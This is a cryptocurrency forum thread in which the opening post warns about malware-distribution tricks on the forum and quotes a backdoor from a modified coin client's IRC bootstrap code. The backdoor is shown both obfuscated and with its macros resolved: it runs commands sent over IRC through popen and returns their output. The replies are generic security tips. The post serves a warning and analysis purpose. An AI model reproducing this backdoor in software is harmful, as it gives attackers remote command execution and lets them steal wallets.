Miha Kot
Newbie
Offline
Activity: 56
Merit: 0
|
|
June 30, 2018, 11:50:41 AM |
|
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety. "latest wallet"/"custom wallet"/"faster miner"A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly. Copied/new ANNThe attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later). Replacing links in quotesThe attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link. Compromised dev accountThe developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update. Packed/FUD executablesIn most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable. Modified source with backdoorThis was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism. here is the relevant source code: if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) { CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; CFree(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str()); } } here is the source code with macros resolved: if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1) { FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; pclose(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str()); } } The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.What security system to do to avoid falling into the trap of cybercriminals and how to understand that it is cybercriminals ?
|
|
|
|
|
|
Once a transaction has 6 confirmations, it is extremely unlikely that an attacker without at least 50% of the network's computation power would be able to reverse it.
|
|
|
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
|
|
diego ramos
Newbie
Offline
Activity: 113
Merit: 0
|
|
June 30, 2018, 05:32:07 PM |
|
Tell me, is it so MAC OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected
|
|
|
|
dablatair
Member
Offline
Activity: 324
Merit: 15
|
|
July 04, 2018, 08:46:06 AM |
|
I'm quite impressed by the power and imagination of hackers to find the weakness and explote it everywhere !
finally you never know if you are 100% safe or not.
Just be carefull as much as possible
|
|
|
|
iSparta
Member
Offline
Activity: 728
Merit: 10
|
|
July 05, 2018, 07:05:33 PM |
|
a year ago, my email was hacked. After that, the coins were withdrawn from the exchange . It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing
It is better to have special e-mail for exchange with 2FA enabled and special smartphone with Google application. You don’t have to use this e-mail and smartphone for any other purposes.
|
|
|
|
cryptohorizons
Newbie
Offline
Activity: 2
Merit: 0
|
|
July 06, 2018, 06:22:49 AM |
|
I've seen some ads on FB and Google that takes you to a page that installs mining scripts too...
|
|
|
|
Ethan101
Newbie
Offline
Activity: 98
Merit: 0
|
|
July 06, 2018, 07:20:52 AM |
|
Now a days a lot of phishing and malware infected hacking attempts are happening due to bad guys who want to steel your personal information specially private keys. Block chain technology is a good technology but still it has a lot of problems that need to be addressed. I want in every cryptocurrency wallet there should be double factor authentication key that work with Google authenticator.
|
|
|
|
Proba001
Newbie
Offline
Activity: 6
Merit: 0
|
|
July 06, 2018, 08:16:47 AM |
|
double authentication is the best thing you can think of !!! I agree to the whole 100%
|
|
|
|
fsn
Member
Offline
Activity: 224
Merit: 10
|
|
July 06, 2018, 10:19:42 AM |
|
Always beware of increased sophisticated malware infection attempts and just believe.
|
|
|
|
edsnowangel
Member
Offline
Activity: 280
Merit: 39
Citowise-Developing Crypotpayment Infrastructure
|
|
July 08, 2018, 02:07:15 PM |
|
correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough? if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
yes most of the malware are executable files in windows operating system but this doesn't mean that malware can't affect other operating system such as MAC and Linux Distro there are other malware and viruses that can also penetrate other operating OS the key is to make sure that we will not easily fall to the trap of this people who are taking advantage of newbies.
|
sd
|
|
|
Birenda23
Newbie
Offline
Activity: 11
Merit: 0
|
|
July 08, 2018, 04:55:01 PM |
|
I hope to have a healthy community and warn the coin to show signs of scam
|
|
|
|
meerkatoken
Copper Member
Jr. Member
Offline
Activity: 42
Merit: 2
|
|
July 08, 2018, 05:52:53 PM |
|
correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough? if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
yes most of the malware are executable files in windows operating system but this doesn't mean that malware can't affect other operating system such as MAC and Linux Distro there are other malware and viruses that can also penetrate other operating OS the key is to make sure that we will not easily fall to the trap of this people who are taking advantage of newbies. I believe the best you can do is to install the latest malwarebytes. It is available for Win, Mac and Linux as well.
|
|
|
|
coincentrado
Jr. Member
Offline
Activity: 36
Merit: 1
|
|
July 08, 2018, 08:42:06 PM |
|
Thanks for the warning!
|
Sígueme en Steemit.com/@coincentrado
|
|
|
userclix
Newbie
Offline
Activity: 25
Merit: 0
|
|
July 09, 2018, 06:14:31 AM |
|
Thank you for identifying these issues and providing useful tips and solutions to avoid being scammed. The crypto currency sphere needs this type of vigilance to attract more users in the future. It is really helpful. Much appreciated!
|
|
|
|
cryptohelp2
Newbie
Offline
Activity: 11
Merit: 0
|
|
July 09, 2018, 06:46:34 AM |
|
It's extremely important to be updated about security vulnerables these days.
|
|
|
|
Phuc1411
Newbie
Offline
Activity: 126
Merit: 0
|
|
July 09, 2018, 12:58:48 PM |
|
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money. this is very helpful. am very carefree while on the net. but with this information i will be more cautious
|
|
|
|
DeathCrash
Member
Offline
Activity: 182
Merit: 12
|
|
July 09, 2018, 06:37:09 PM |
|
The software of hackers is improved every hour with this you can not argue, so as not to become a victim of a hacker, observe simple rules. 1. Update the antivirus in time 2. Enable Auto-update of the system and all important programs (Browsers, Java script, etc.) 3. Buy a good router 4. Or as an option to use for Linux wallets
|
|
|
|
edsnowangel
Member
Offline
Activity: 280
Merit: 39
Citowise-Developing Crypotpayment Infrastructure
|
|
July 10, 2018, 12:45:23 AM |
|
The software of hackers is improved every hour with this you can not argue, so as not to become a victim of a hacker, observe simple rules. 1. Update the antivirus in time 2. Enable Auto-update of the system and all important programs (Browsers, Java script, etc.) 3. Buy a good router 4. Or as an option to use for Linux wallets
Great suggestion linux wallet and linux os is great but there are othee attacks like spoofings to inject malware in the users machine to avoid getting hack I will add make aure you are connected to a secure DnS servers this will also add a little security in you machine.
|
sd
|
|
|
Pomualdo
Newbie
Offline
Activity: 91
Merit: 0
|
|
July 10, 2018, 04:25:44 PM |
|
I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.
|
|
|
|
NeelMariaWarner
Jr. Member
Offline
Activity: 350
Merit: 3
Change Your Worlds Build a New Era!
|
|
July 13, 2018, 03:14:48 PM |
|
The software of hackers is improved every hour with this you can not argue, so as not to become a victim of a hacker, observe simple rules. 1. Update the antivirus in time 2. Enable Auto-update of the system and all important programs (Browsers, Java script, etc.) 3. Buy a good router 4. Or as an option to use for Linux wallets
good advice sir,really usefull for me myself because my computer has been hacked long time ago. so for now i can anticipated for the safety of my laptop. thanks sir
|
Orionix |│ The Future of Gaming Comission Free Games And Items Exchange WHITEPAPER TWITTER TELEGRAM
|
|
|
Pojumek
Newbie
Offline
Activity: 42
Merit: 0
|
|
July 13, 2018, 03:29:40 PM |
|
remedy me if im wrong yet maleware its generecly for executables in windows no? I mean the wallets are nevertheless its not kaspersky enough?
if not for what reason do we have to shield from the instance of reteiving passorws from the clients and other stuff from enven pen drives with wallets (counting the regular coins ones) like doge ltc btc and a couple of something beyond.
|
|
|
|
|